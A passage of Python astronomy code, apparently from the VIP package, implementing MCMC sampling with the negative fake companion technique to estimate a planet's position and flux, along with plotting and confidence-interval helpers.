if isinstance(mu_sigma, tuple):
mu = mu_sigma[0]
sigma2 = mu_sigma[1]**2
num = np.power(mu-values,2)
denom = 0
if 'spe' in sigma:
denom += sigma2
if 'pho' in sigma:
denom += np.abs(values-mu)
lnlikelihood = -0.5* np.sum(num/denom)
else:
mu = mu_sigma
# old version - delete?
if fmerit == 'sum':
lnlikelihood = -0.5 * np.sum(np.abs(values-mu))
elif fmerit == 'stddev':
values = values[values != 0]
lnlikelihood = -np.std(values,ddof=1)*values.size
else:
raise RuntimeError('fmerit choice not recognized.')
if debug:
return lnlikelihood, cube_negfc
else:
return lnlikelihood
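# Hedged numeric illustration (added comment, not in the original module) of the
# merit functions computed in lnlike above; the numbers are made up:
#   values = np.array([2., -1., 3.]); mu, sigma = 0.5, 1.0
#   * mu_sigma branch:  -0.5 * np.sum((mu - values)**2 / denom)
#     with denom = sigma**2 (+ np.abs(values - mu) if photon noise is included)
#   * fmerit='sum':     -0.5 * np.sum(np.abs(values - mu))
#   * fmerit='stddev':  -np.std(values, ddof=1) * values.size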
def lnprob(param,bounds, cube, angs, plsc, psf_norm, fwhm,
annulus_width, ncomp, aperture_radius, initial_state, cube_ref=None,
svd_mode='lapack', scaling='temp-mean', algo=pca_annulus,
delta_rot=1, fmerit='sum', imlib='vip-fft', interpolation='lanczos4',
collapse='median', algo_options={}, weights=None, transmission=None,
mu_sigma=True, sigma='spe+pho', display=False):
""" Define the probability log-function as the sum between the prior and
likelihood log-funtions.
Parameters
----------
param: tuple
The model parameters.
bounds: list
The bounds for each model parameter.
Ex: bounds = [(10,20),(0,360),(0,5000)]
cube: numpy.array
The cube of fits images expressed as a numpy.array.
angs: numpy.array
The parallactic angle fits image expressed as a numpy.array.
plsc: float
The platescale, in arcsec per pixel.
psf_norm: numpy.array
The scaled psf expressed as a numpy.array.
fwhm : float
The FHWM in pixels.
annulus_width: float
The width in pixel of the annulus on wich the PCA is performed.
ncomp: int or None
The number of principal components for PCA-based algorithms.
aperture_radius: float
The radius of the circular aperture in FWHM.
initial_state: numpy.array
The initial guess for the position and the flux of the planet.
cube_ref : numpy ndarray, 3d, optional
Reference library cube. For Reference Star Differential Imaging.
svd_mode : {'lapack', 'randsvd', 'eigen', 'arpack'}, str optional
Switch for different ways of computing the SVD and selected PCs.
scaling : {'temp-mean', 'temp-standard'} or None, optional
With None, no scaling is performed on the input data before SVD. With
"temp-mean" then temporal px-wise mean subtraction is done and with
"temp-standard" temporal mean centering plus scaling to unit variance
is done.
fmerit : {'sum', 'stddev'}, string optional
Chooses the figure of merit to be used. stddev works better for close in
companions sitting on top of speckle noise.
imlib : str, optional
See the documentation of the ``vip_hci.preproc.frame_rotate`` function.
interpolation : str, optional
See the documentation of the ``vip_hci.preproc.frame_rotate`` function.
algo_options, : dict, opt
Dictionary with additional parameters related to the algorithm
(e.g. tol, min_frames_lib, max_frames_lib). If 'algo' is not a vip
routine, this dict should contain all necessary arguments apart from
the cube and derotation angles. Note: arguments such as ncomp, svd_mode,
scaling, imlib, interpolation or collapse can also be included in this
dict (the latter are also kept as function arguments for consistency
with older versions of vip).
collapse : {'median', 'mean', 'sum', 'trimmean', None}, str or None, optional
Sets the way of collapsing the frames for producing a final image. If
None then the cube of residuals is used when measuring the function of
merit (instead of a single final frame).
weights : 1d array, optional
If provided, the negative fake companion fluxes will be scaled according
to these weights before injection in the cube. Can reflect changes in
the observing conditions throughout the sequence.
transmission: numpy array, optional
Radial transmission of the coronagraph, if any. Array with 2 columns.
First column is the radial separation in pixels. Second column is the
off-axis transmission (between 0 and 1) at the radial separation given
in column 1.
mu_sigma: tuple of 2 floats or None, opt
If set to None: not used, and falls back to original version of the
algorithm, using fmerit. Otherwise, should be a tuple of 2 elements,
containing the mean and standard deviation of pixel intensities in an
annulus centered on the location of the companion, excluding the area
directly adjacent to the companion.
sigma: str, opt
Sets the type of noise to be included as sigma^2 in the log-probability
expression. Choice between 'pho' for photon (Poisson) noise, 'spe' for
residual (mostly whitened) speckle noise, or 'spe+pho' for both.
display: boolean
If True, the cube is displayed with ds9.
Returns
-------
out: float
The probability log-function.
"""
if initial_state is None:
initial_state = param
lp = lnprior(param, bounds)
if np.isinf(lp):
return -np.inf
return lp + lnlike(param, cube, angs, plsc, psf_norm, fwhm, annulus_width,
ncomp, aperture_radius, initial_state, cube_ref,
svd_mode, scaling, algo, delta_rot, fmerit, imlib,
interpolation, collapse, algo_options, weights,
transmission, mu_sigma, sigma)
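# Hedged note (added comment, not in the original module): lnprob rejects
# out-of-bounds parameters through lnprior before any PCA work is done, e.g.
# with bounds = [(10, 20), (0, 360), (0, 5000)] the vector (25., 10., 100.)
# yields -np.inf immediately, while in-bounds vectors return lnprior + lnlike.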
def mcmc_negfc_sampling(cube, angs, psfn, ncomp, plsc, initial_state, fwhm=4,
annulus_width=8, aperture_radius=1, cube_ref=None,
svd_mode='lapack', scaling=None, algo=pca_annulus,
delta_rot=1, fmerit='sum', imlib='vip-fft',
interpolation='lanczos4', collapse='median',
algo_options={}, wedge=None, weights=None,
transmission=None, mu_sigma=True, sigma='spe+pho',
nwalkers=100, bounds=None, a=2.0, burnin=0.3,
rhat_threshold=1.01, rhat_count_threshold=1,
niteration_min=10, niteration_limit=10000,
niteration_supp=0, check_maxgap=20, conv_test='ac',
ac_c=50, ac_count_thr=3, nproc=1, output_dir='results/',
output_file=None, display=False, verbosity=0,
save=False):
r""" Runs an affine invariant mcmc sampling algorithm in order to determine
the position and the flux of the planet using the 'Negative Fake Companion'
technique. The result of this procedure is a chain with the samples from the
posterior distributions of each of the 3 parameters.
This technique can be summarized as follows:
1) We inject a negative fake companion (one candidate) at a given position
and characterized by a given flux, both close to the expected values.
2) We run PCA on an full annulus which pass through the initial guess,
regardless of the position of the candidate.
3) We extract the intensity values of all the pixels contained in a
circular aperture centered on the initial guess.
4) We calculate a function of merit :math:`\chi^2` (see below).
The steps 1) to 4) are then looped. At each iteration, the candidate model
parameters are defined by the emcee Affine Invariant algorithm.
There are different possibilities for the figure of merit (step 4):
- mu_sigma=None; fmerit='sum' (as in Wertz et al. 2017):
.. math:: \chi^2 = \sum(\|I_j\|)
- mu_sigma=None; fmerit='stddev' (likely more appropriate when speckle
noise still significant):
        .. math:: \chi^2 = N \sigma_{I_j}
    - mu_sigma=True or a tuple (as in Christiaens et al. 2021, new default):
        .. math:: \chi^2 = \sum\frac{(I_j-\mu)^2}{\sigma^2}
where :math:`j \in {1,...,N}` with N the total number of pixels
contained in the circular aperture, :math:`\sigma_{I_j}` is the standard
deviation of :math:`I_j` values, and :math:`\mu` is the mean pixel
intensity in a truncated annulus at the radius of the companion candidate
(i.e. excluding the cc region).
See description of `mu_sigma` and `sigma` for more details on
    :math:`\sigma`.
Parameters
----------
cube: numpy.array
ADI fits cube.
angs: numpy.array
The parallactic angle vector.
psfn: numpy 2D or 3D array
Normalised PSF template used for negative fake companion injection.
The PSF must be centered and the flux in a 1xFWHM aperture must equal 1
(use ``vip_hci.metrics.normalize_psf``).
If a 3D array is provided, it must match the number of frames of ADI
cube. This can be useful if the cube was unsaturated and conditions
were variable.
ncomp: int or None
The number of principal components for PCA-based algorithms.
plsc: float
The platescale, in arcsec per pixel.
annulus_width: float, optional
The width in pixels of the annulus on which the PCA is performed.
aperture_radius: float, optional
The radius in FWHM of the circular aperture.
nwalkers: int optional
The number of Goodman & Weare 'walkers'.
initial_state: numpy.array
The first guess for the position and flux of the planet, respectively.
Each walker will start in a small ball around this preferred position.
cube_ref : numpy ndarray, 3d, optional
Reference library cube. For Reference Star Differential Imaging.
svd_mode : {'lapack', 'randsvd', 'eigen', 'arpack'}, str optional
Switch for different ways of computing the SVD and selected PCs.
'randsvd' is not recommended for the negative fake companion technique.
algo : python routine
Post-processing algorithm used to model and subtract the star. First
2 arguments must be input cube and derotation angles. Must return a
post-processed 2d frame.
scaling : {'temp-mean', 'temp-standard'} or None, optional
With None, no scaling is performed on the input data before SVD. With
"temp-mean" then temporal px-wise mean subtraction is done and with
"temp-standard" temporal mean centering plus scaling to unit variance
is done.
fmerit : {'sum', 'stddev'}, string optional
Chooses the figure of merit to be used. stddev works better for
close-in companions sitting on top of speckle noise.
imlib : str, optional
Imlib used for both image rotation and sub-px shift:
- "opencv": will use it for both;
- "skimage" or "ndimage-interp" will use scikit-image and \
scipy.ndimage for rotation and shift resp.;
- "ndimage-fourier" or "vip-fft" will use Fourier transform based \
methods for both.
interpolation : str, optional
Interpolation order. See the documentation of the
``vip_hci.preproc.frame_rotate`` function. Note that the interpolation
options are identical for rotation and shift within each of the 3 imlib
cases above.
collapse : {'median', 'mean', 'sum', 'trimmean', None}, str or None, optional
Sets the way of collapsing the frames for producing a final image. If
None then the cube of residuals is used when measuring the function of
merit (instead of a single final frame).
algo_options: dict, opt
Dictionary with additional parameters related to the algorithm
(e.g. tol, min_frames_lib, max_frames_lib). If 'algo' is not a vip
routine, this dict should contain all necessary arguments apart from
the cube and derotation angles. Note: arguments such as ncomp, svd_mode,
scaling, imlib, interpolation or collapse can also be included in this
dict (the latter are also kept as function arguments for consistency
with older versions of vip).
wedge: tuple, opt
Range in theta where the mean and standard deviation are computed in an
annulus defined in the PCA image. If None, it will be calculated
automatically based on initial guess and derotation angles to avoid.
If some disc signal is present elsewhere in the annulus, it is
recommended to provide wedge manually. The provided range should be
continuous and >0. E.g. provide (270, 370) to consider a PA range
between [-90,+10].
weights : 1d array, optional
If provided, the negative fake companion fluxes will be scaled according
to these weights before injection in the cube. Can reflect changes in
the observing conditions throughout the sequence.
transmission: numpy array, optional
Radial transmission of the coronagraph, if any. Array with 2 columns.
First column is the radial separation in pixels. Second column is the
off-axis transmission (between 0 and 1) at the radial separation given
in column 1.
mu_sigma: tuple of 2 floats or bool, opt
If set to None: not used, and falls back to original version of the
algorithm, using fmerit (Wertz et al. 2017).
If a tuple of 2 elements: should be the mean and standard deviation of
pixel intensities in an annulus centered on the location of the
companion candidate, excluding the area directly adjacent to the CC.
If set to anything else, but None/False/tuple: will compute said mean
and standard deviation automatically.
These values will then be used in the log-probability of the MCMC.
sigma: str, opt
Sets the type of noise to be included as sigma^2 in the log-probability
expression. Choice between 'pho' for photon (Poisson) noise, 'spe' for
residual (mostly whitened) speckle noise, or 'spe+pho' for both.
bounds: numpy.array or list, default=None, optional
The prior knowledge on the model parameters. If None, large bounds will
be automatically estimated from the initial state.
a: float, default=2.0
The proposal scale parameter. See notes.
burnin: float, default=0.3
The fraction of a walker chain which is discarded. NOTE: only used for
Gelman-Rubin convergence test - the chains are returned full.
    rhat_threshold: float, default=1.01
The Gelman-Rubin threshold used for the test for nonconvergence.
rhat_count_threshold: int, optional
The Gelman-Rubin test must be satisfied 'rhat_count_threshold' times in
a row before claiming that the chain has converged.
conv_test: str, optional {'gb','ac'}
Method to check for convergence:
- 'gb' for gelman-rubin test
(http://digitalassets.lib.berkeley.edu/sdtr/ucb/text/305.pdf)
- 'ac' for autocorrelation analysis
(https://emcee.readthedocs.io/en/stable/tutorials/autocorr/)
ac_c: float, optional
If the convergence test is made using the auto-correlation, this is the
value of C such that tau/N < 1/C is the condition required for tau to be
considered a reliable auto-correlation time estimate (for N number of
samples). Recommended: C>50.
More details here:
https://emcee.readthedocs.io/en/stable/tutorials/autocorr/
    ac_count_thr: int, optional
The auto-correlation test must be satisfied ac_c_thr times in a row
before claiming that the chain has converged.
niteration_min: int, optional
Steps per walker lower bound. The simulation will run at least this
number of steps per walker.
niteration_limit: int, optional
Steps per walker upper bound. If the simulation runs up to
'niteration_limit' steps without having reached the convergence
criterion, the run is stopped.
niteration_supp: int, optional
Number of iterations to run after having "reached the convergence".
check_maxgap: int, optional
Maximum number of steps per walker between two Gelman-Rubin test.
nproc: int, optional
The number of processes to use for parallelization.
output_dir: str, optional
The name of the output directory which contains the output files in the
case ``save`` is True.
output_file: str, optional
The name of the output file which contains the MCMC results in the case
``save`` is True.
display: bool, optional
If True, the walk plot is displayed at each evaluation of the Gelman-
Rubin test.
verbosity: 0, 1, 2 or 3, optional
Verbosity level. 0 for no output and 3 for full information.
(only difference between 2 and 3 is that 3 also writes intermediate
pickles containing the state of the chain at convergence tests; these
can end up taking a lot of space).
save: bool, optional
If True, the MCMC results are pickled.
Returns
-------
out : numpy.array
The MCMC chain.
Notes
-----
The parameter ``a`` must be > 1. For more theoretical information
concerning this parameter, see Goodman & Weare, 2010, Comm. App. Math.
Comp. Sci., 5, 65, Eq. [9] p70.
The parameter 'rhat_threshold' can be a numpy.array with individual
threshold value for each model parameter.
"""
if verbosity >0:
start_time = time_ini()
print(" MCMC sampler for the NEGFC technique ")
print(sep)
# If required, one create the output folder.
if save:
output_file_tmp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
if output_dir[-1] == '/':
output_dir = output_dir[:-1]
try:
os.makedirs(output_dir)
except OSError as exc:
if exc.errno == 17 and os.path.isdir(output_dir):
# errno.EEXIST == 17 -> File exists
pass
else:
raise
if not isinstance(cube, np.ndarray) or cube.ndim != 3:
raise ValueError('`cube` must be a 3D numpy array')
if cube_ref is not None:
if not isinstance(cube_ref, np.ndarray) or cube_ref.ndim != 3:
raise ValueError('`cube_ref` must be a 3D numpy array')
if weights is not None:
if not len(weights)==cube.shape[0]:
raise TypeError("Weights should have same length as cube axis 0")
norm_weights = weights/np.sum(weights)
else:
norm_weights=weights
if psfn.ndim==3:
if psfn.shape[0] != cube.shape[0]:
msg = "If PSF is 3D, number of frames must match cube length"
raise TypeError(msg)
if 'spe' not in sigma and 'pho' not in sigma:
raise ValueError("sigma not recognized")
## set imlib for rotation and shift
if imlib == 'opencv':
imlib_rot = imlib
elif imlib == 'skimage' or imlib == 'ndimage-interp':
imlib_rot = 'skimage'
elif imlib == 'vip-fft' or imlib == 'ndimage-fourier':
imlib_rot = 'vip-fft'
else:
raise TypeError("Interpolation not recognized.")
if nproc is None:
nproc = cpu_count() // 2 # Hyper-threading doubles the # of cores
# #########################################################################
# Initialization of the variables
# #########################################################################
dim = 3 # There are 3 model parameters: rad, theta, flux
itermin = niteration_min
limit = niteration_limit
supp = niteration_supp
maxgap = check_maxgap
initial_state = np.array(initial_state)
mu_sig = get_mu_and_sigma(cube, angs, ncomp, annulus_width,
aperture_radius, fwhm, initial_state[0],
initial_state[1], cube_ref=cube_ref, wedge=wedge,
svd_mode=svd_mode, scaling=scaling, algo=algo,
delta_rot=delta_rot, imlib=imlib_rot,
interpolation=interpolation, collapse=collapse,
weights=norm_weights, algo_options=algo_options)
# Measure mu and sigma once in the annulus (instead of each MCMC step)
if isinstance(mu_sigma, tuple):
if len(mu_sigma) != 2:
raise TypeError("if a tuple, mu_sigma should have 2 elements")
elif mu_sigma:
mu_sigma = mu_sig
if verbosity >0:
msg = "The mean and stddev in the annulus at the radius of the "
msg+= "companion (excluding the PA area directly adjacent to it)"
msg+=" are {:.2f} and {:.2f} respectively."
print(msg.format(mu_sigma[0],mu_sigma[1]))
else:
mu_sigma = mu_sig[0] # just take mean
if itermin > limit:
itermin = 0
fraction = 0.3
geom = 0
lastcheck = 0
konvergence = np.inf
rhat_count = 0
ac_count = 0
chain = np.empty([nwalkers, 1, dim])
nIterations = limit + supp
rhat = np.zeros(dim)
stop = np.inf
if bounds is None:
# angle subtended by aperture_radius/2 or fwhm at r=initial_state[0]
drot = 360/(2*np.pi*initial_state[0]/(aperture_radius*fwhm/2))
bounds = [(initial_state[0] - annulus_width/2.,
initial_state[0] + annulus_width/2.), # radius
(initial_state[1] - drot, initial_state[1] + drot), # angle
(0.1* initial_state[2], 2 * initial_state[2])] # flux
# size of ball of parameters for MCMC initialization
scal = abs(bounds[0][0]-initial_state[0])/initial_state[0]
for i in range(3):
for j in range(2):
test_scal = abs(bounds[i][j]-initial_state[i])/initial_state[i]
if test_scal < scal:
scal= test_scal
pos = initial_state*(1+np.random.normal(0, scal/7., (nwalkers, 3)))
# divided by 7 to not have any walker initialized out of bounds
if verbosity > 0:
print('Beginning emcee Ensemble sampler...')
sampler = emcee.EnsembleSampler(nwalkers, dim, lnprob, a=a,
args=([bounds, cube, angs, plsc, psfn,
fwhm, annulus_width, ncomp,
aperture_radius, initial_state,
cube_ref, svd_mode, scaling, algo,
delta_rot, fmerit, imlib,
interpolation, collapse,
algo_options, weights, transmission,
mu_sigma, sigma]),
threads=nproc)
if verbosity > 0:
print('emcee Ensemble sampler successful')
start = datetime.datetime.now()
# #########################################################################
# Affine Invariant MCMC run
# #########################################################################
if verbosity > 1:
print('\nStart of the MCMC run ...')
print('Step | Duration/step (sec) | Remaining Estimated Time (sec)')
for k, res in enumerate(sampler.sample(pos, iterations=nIterations)):
elapsed = (datetime.datetime.now()-start).total_seconds()
if verbosity > 1:
if k == 0:
q = 0.5
else:
q = 1
print('{}\t\t{:.5f}\t\t\t{:.5f}'.format(k, elapsed * q,
elapsed * (limit-k-1) * q),
flush=True)
start = datetime.datetime.now()
# ---------------------------------------------------------------------
# Store the state manually in order to handle with dynamical sized chain
# ---------------------------------------------------------------------
# Check if the size of the chain is long enough.
s = chain.shape[1]
if k+1 > s: # if not, one doubles the chain length
empty = np.zeros([nwalkers, 2*s, dim])
chain = np.concatenate((chain, empty), axis=1)
# Store the state of the chain
chain[:, k] = res[0]
# ---------------------------------------------------------------------
# If k meets the criterion, one tests the non-convergence.
# ---------------------------------------------------------------------
criterion = int(np.amin([np.ceil(itermin*(1+fraction)**geom),
lastcheck+np.floor(maxgap)]))
if k == criterion:
if verbosity > 1:
print('\n {} convergence test in progress...'.format(conv_test))
geom += 1
lastcheck = k
if display:
show_walk_plot(chain)
if save and verbosity == 3:
fname = '{d}/{f}_temp_k{k}'.format(d=output_dir,f=output_file_tmp, k=k)
data = {'chain': sampler.chain,
'lnprob': sampler.lnprobability,
'AR': sampler.acceptance_fraction}
with open(fname, 'wb') as fileSave:
pickle.dump(data, fileSave)
# We only test the rhat if we have reached the min # of steps
if (k+1) >= itermin and konvergence == np.inf:
if conv_test == 'gb':
thr0 = int(np.floor(burnin*k))
thr1 = int(np.floor((1-burnin)*k*0.25))
# We calculate the rhat for each model parameter.
for j in range(dim):
part1 = chain[:, thr0:thr0 + thr1, j].reshape(-1)
part2 = chain[:, thr0 + 3 * thr1:thr0 + 4 * thr1, j
].reshape(-1)
series = np.vstack((part1, part2))
rhat[j] = gelman_rubin(series)
if verbosity > 0:
print(' r_hat = {}'.format(rhat))
cond = rhat <= rhat_threshold
print(' r_hat <= threshold = {} \n'.format(cond))
# We test the rhat.
if (rhat <= rhat_threshold).all():
rhat_count += 1
if rhat_count < rhat_count_threshold:
if verbosity > 0:
msg = "Gelman-Rubin test OK {}/{}"
print(msg.format(rhat_count, rhat_count_threshold))
elif rhat_count >= rhat_count_threshold:
if verbosity > 0 :
print('... ==> convergence reached')
konvergence = k
stop = konvergence + supp
else:
rhat_count = 0
elif conv_test == 'ac':
# We calculate the auto-corr test for each model parameter.
if save:
write_fits(output_dir+"/TMP_test_chain{:.0f}.fits".format(k),chain[:,:k])
for j in range(dim):
rhat[j] = autocorr_test(chain[:,:k,j])
thr = 1./ac_c
if verbosity > 0:
print('Auto-corr tau/N = {}'.format(rhat))
print('tau/N <= {} = {} \n'.format(thr, rhat<thr))
if (rhat <= thr).all():
ac_count+=1
if verbosity > 0:
msg = "Auto-correlation test passed for all params!"
msg+= "{}/{}".format(ac_count,ac_count_thr)
print(msg)
if ac_count >= ac_count_thr:
msg='\n ... ==> convergence reached'
print(msg)
stop = k
else:
ac_count = 0
else:
raise ValueError('conv_test value not recognized')
# append the autocorrelation factor to file for easy reading
if save:
with open(output_dir + '/MCMC_results_tau.txt', 'a') as f:
f.write(str(rhat) + '\n')
# We have reached the maximum number of steps for our Markov chain.
if k+1 >= stop:
if verbosity > 0:
print('We break the loop because we have reached convergence')
break
if k == nIterations-1:
if verbosity > 0:
print("We have reached the limit # of steps without convergence")
if save:
frame = inspect.currentframe()
args, _, _, values = inspect.getargvalues(frame)
input_parameters = {j: values[j] for j in args[1:]}
output = {'chain': chain_zero_truncated(chain),
'input_parameters': input_parameters,
'AR': sampler.acceptance_fraction,
'lnprobability': sampler.lnprobability}
if output_file is None:
output_file = 'MCMC_results'
with open(output_dir+'/'+output_file, 'wb') as fileSave:
pickle.dump(output, fileSave)
        msg = "\nThe file {} has been stored in the folder {}"
        print(msg.format(output_file, output_dir+'/'))
if verbosity > 0:
timing(start_time)
return chain_zero_truncated(chain)
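# Hedged usage sketch (added comment, not in the original module): a typical
# call chains the sampler with the helpers defined below; every value shown is
# a placeholder, not a recommendation.
#   chain = mcmc_negfc_sampling(cube, angs, psfn, ncomp=5, plsc=0.0272,
#                               initial_state=(30.0, 112.0, 400.0), fwhm=4.2,
#                               nwalkers=100, niteration_limit=300, nproc=4)
#   show_walk_plot(chain)
#   burned = chain[:, int(0.3 * chain.shape[1]):, :].reshape((-1, 3))
#   val_max, conf_int = confidence(burned, cfd=68.27, bins=100)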
def chain_zero_truncated(chain):
"""
Return the Markov chain with the dimension: walkers x steps* x parameters,
where steps* is the last step before having 0 (not yet constructed chain).
Parameters
----------
chain: numpy.array
The MCMC chain.
Returns
-------
out: numpy.array
The truncated MCMC chain, that is to say, the chain which only contains
relevant information.
"""
try:
idxzero = np.where(chain[0, :, 0] == 0.0)[0][0]
except:
idxzero = chain.shape[1]
return chain[:, 0:idxzero, :]
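# Hedged illustration (added comment, not in the original module): if the chain
# was pre-allocated for 400 steps but the sampler stopped after 250, the first
# all-zero step marks the cut, so a (nwalkers, 400, 3) array comes back as
# (nwalkers, 250, 3).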
def show_walk_plot(chain, save=False, output_dir='', **kwargs):
"""
Display or save a figure showing the path of each walker during the MCMC run
Parameters
----------
chain: numpy.array
The Markov chain. The shape of chain must be nwalkers x length x dim.
If a part of the chain is filled with zero values, the method will
discard these steps.
save: boolean, default: False
If True, a pdf file is created.
output_dir: str, optional
The name of the output directory which contains the output files in the
case ``save`` is True.
kwargs:
Additional attributes are passed to the matplotlib plot method.
Returns
-------
Display the figure or create a pdf file named walk_plot.pdf in the working
directory.
"""
temp = np.where(chain[0, :, 0] == 0.0)[0]
if len(temp) != 0:
chain = chain[:, :temp[0], :]
labels = kwargs.pop('labels', ["$r$", r"$\theta$", "$f$"])
fig, axes = plt.subplots(3, 1, sharex=True,
figsize=kwargs.pop('figsize', (8, 6)))
axes[2].set_xlabel(kwargs.pop('xlabel', 'step number'))
axes[2].set_xlim(kwargs.pop('xlim', [0, chain.shape[1]]))
color = kwargs.pop('color', 'k')
alpha = kwargs.pop('alpha', 0.4)
for j in range(3):
axes[j].plot(chain[:, :, j].T, color=color, alpha=alpha, **kwargs)
axes[j].yaxis.set_major_locator(MaxNLocator(5))
axes[j].set_ylabel(labels[j])
fig.tight_layout(h_pad=0)
if save:
plt.savefig(output_dir+'walk_plot.pdf')
plt.close(fig)
else:
plt.show()
def show_corner_plot(chain, burnin=0.5, save=False, output_dir='', **kwargs):
"""
Display or save a figure showing the corner plot (pdfs + correlation plots)
Parameters
----------
chain: numpy.array
The Markov chain. The shape of chain must be nwalkers x length x dim.
If a part of the chain is filled with zero values, the method will
discard these steps.
    burnin: float, default: 0.5
The fraction of a walker chain we want to discard.
save: boolean, default: False
If True, a pdf file is created.
output_dir: str, optional
The name of the output directory which contains the output files in the
case ``save`` is True.
kwargs:
Additional attributes are passed to the corner.corner() method.
Returns
-------
    Display the figure or create a pdf file named corner_plot.pdf in the working
    directory.
Raises
------
ImportError
"""
try:
temp = np.where(chain[0, :, 0] == 0.0)[0]
if len(temp) != 0:
chain = chain[:, :temp[0], :]
length = chain.shape[1]
indburn = int(np.floor(burnin*(length-1)))
chain = chain[:, indburn:length, :].reshape((-1, 3))
except IndexError:
pass
if chain.shape[0] == 0:
print("It seems the chain is empty. Have you already run the MCMC?")
else:
labels = kwargs.pop('labels', ["$r$", r"$\theta$", "$f$"])
fig = corner.corner(chain, labels=labels, **kwargs)
if save:
plt.savefig(output_dir+'corner_plot.pdf')
plt.close(fig)
else:
plt.show()
def confidence(isamples, cfd=68.27, bins=100, gaussian_fit=False, weights=None,
verbose=True, save=False, output_dir='', force=False,
output_file='confidence.txt', title=None, plsc=None, **kwargs):
r"""
Determine the highly probable value for each model parameter, as well as
the 1-sigma confidence interval.
Parameters
----------
isamples: numpy.array
The independent samples for each model parameter.
cfd: float, optional
The confidence level given in percentage.
bins: int, optional
The number of bins used to sample the posterior distributions.
gaussian_fit: boolean, optional
If True, a gaussian fit is performed in order to determine
(:math:`\mu, \sigma`).
weights : (n, ) numpy ndarray or None, optional
An array of weights for each sample.
verbose: boolean, optional
Display information in the shell.
save: boolean, optional
If "True", a txt file with the results is saved in the output
repository.
output_dir: str, optional
If save is True, this is the full path to a directory where the results
are saved.
force: bool, optional
If set to True, force the confidence interval estimate even if too
many samples fall in a single bin (unreliable CI estimates). If False,
an error message is raised if the percentile of samples falling in a
single bin is larger than cfd, suggesting to increase number of bins.
output_file: str, opt
If save is True, name of the text file in which the results are saved.
title: bool or str, opt
If not None, will print labels and parameter values on top of each
plot. If a string, will print that label in front of the parameter
values.
plsc: float, opt
If save is True, this is used to convert pixels to arcsec when writing
results for r.
Returns
-------
out: tuple
A 2 elements tuple with either:
[gaussian_fit=False] a) the highly probable solutions (dictionary),
b) the respective confidence interval (dict.);
[gaussian_fit=True] a) the center of the best-fit 1d Gaussian
distributions (tuple of 3 floats), and
b) their standard deviation, for each parameter
"""
try:
l = isamples.shape[1]
if l == 1:
isamples = isamples[:,0]
pKey = ['f']
label_file = ['flux']
label = [r'$\Delta f$']
elif l == 3:
pKey = ['r', 'theta', 'f']
label_file = ['r', r'$\theta$', 'flux']
label = [r'$r$', r'$\theta$', r'$f$']
else:
raise TypeError("input shape of isamples not recognized")
except:
l = 1
pKey = ['f']
label_file = ['flux']
label = [r'$\Delta f$']
confidenceInterval = {}
val_max = {}
if cfd == 100:
cfd = 99.9
#########################################
## Determine the confidence interval ##
#########################################
if gaussian_fit:
mu = np.zeros(l)
sigma = np.zeros_like(mu)
if gaussian_fit:
fig, ax = plt.subplots(2, l, figsize=(int(l*4),8))
else:
fig, ax = plt.subplots(1, l, figsize=(int(l*4),4))
for j in range(l):
if l>1:
if gaussian_fit:
n, bin_vertices, _ = ax[0][j].hist(isamples[:,j], bins=bins,
weights=weights,
histtype='step',
edgecolor='gray')
else:
n, bin_vertices, _ = ax[j].hist(isamples[:,j], bins=bins,
weights=weights,
histtype='step',
edgecolor='gray')
else:
if gaussian_fit:
n, bin_vertices, _ = ax[0].hist(isamples[:], bins=bins,
weights=weights,
histtype='step',
edgecolor='gray')
else:
n, bin_vertices, _ = ax.hist(isamples[:], bins=bins,
weights=weights,
histtype='step',
edgecolor='gray')
bins_width = np.mean(np.diff(bin_vertices))
surface_total = np.sum(np.ones_like(n)*bins_width * n)
n_arg_sort = np.argsort(n)[::-1]
test = 0
pourcentage = 0
for k, jj in enumerate(n_arg_sort):
test = test + bins_width*n[int(jj)]
pourcentage = test/surface_total*100
if pourcentage > cfd:
if verbose:
msg = 'percentage for {}: {}%'
print(msg.format(label_file[j], pourcentage))
break
        if k == 0:
            msg = "WARNING: Percentile reached in a single bin. "
            msg += "This may be due to outliers or a small sample. "
            msg += "Uncertainties will be unreliable. Try one of these: "
            msg += "increase bins, trim outliers, or decrease cfd."
if force:
raise ValueError(msg)
else:
print(msg)
n_arg_min = int(n_arg_sort[:k+1].min())
n_arg_max = int(n_arg_sort[:k+1].max())
if n_arg_min == 0:
n_arg_min += 1
if n_arg_max == bins:
n_arg_max -= 1
val_max[pKey[j]] = bin_vertices[int(n_arg_sort[0])]+bins_width/2.
confidenceInterval[pKey[j]] = np.array([bin_vertices[n_arg_min-1],
bin_vertices[n_arg_max+1]]
- val_max[pKey[j]])
if title is not None:
if isinstance(title, str):
lab = title
else:
lab = pKey[j]
if l>1:
arg = (isamples[:, j] >= bin_vertices[n_arg_min - 1]) * \
(isamples[:, j] <= bin_vertices[n_arg_max + 1])
if gaussian_fit:
ax[0][j].hist(isamples[arg,j], bins=bin_vertices,
facecolor='gray', edgecolor='darkgray',
histtype='stepfilled', alpha=0.5)
ax[0][j].vlines(val_max[pKey[j]], 0, n[int(n_arg_sort[0])],
linestyles='dashed', color='red')
ax[0][j].set_xlabel(label[j])
if j == 0:
ax[0][j].set_ylabel('Counts')
if title is not None:
msg = r"{}: {:.3f} {:.3f} +{:.3f}"
ax[0][j].set_title(msg.format(lab, val_max[pKey[j]],
confidenceInterval[pKey[j]][0],
confidenceInterval[pKey[j]][1]),
fontsize=10)
mu[j], sigma[j] = norm.fit(isamples[:, j])
n_fit, bins_fit = np.histogram(isamples[:, j], bins, density=1,
weights=weights)
ax[1][j].hist(isamples[:, j], bins, density=1, weights=weights,
facecolor='gray', edgecolor='darkgray',
histtype='step')
y = norm.pdf(bins_fit, mu[j], sigma[j])
ax[1][j].plot(bins_fit, y, 'r--', linewidth=2, alpha=0.7)
ax[1][j].set_xlabel(label[j])
if j == 0:
ax[1][j].set_ylabel('Counts')
if title is not None:
msg = r"{}: $\mu$ = {:.4f}, $\sigma$ = {:.4f}"
ax[1][j].set_title(msg.format(lab, mu[j], sigma[j]),
fontsize=10)
else:
ax[j].hist(isamples[arg,j], bins=bin_vertices, facecolor='gray',
edgecolor='darkgray', histtype='stepfilled',
alpha=0.5)
ax[j].vlines(val_max[pKey[j]], 0, n[int(n_arg_sort[0])],
linestyles='dashed', color='red')
ax[j].set_xlabel(label[j])
if j == 0:
ax[j].set_ylabel('Counts')
if title is not None:
msg = r"{}: {:.3f} {:.3f} +{:.3f}"
ax[1].set_title(msg.format(lab, val_max[pKey[j]],
confidenceInterval[pKey[j]][0],
confidenceInterval[pKey[j]][1]),
fontsize=10)
else:
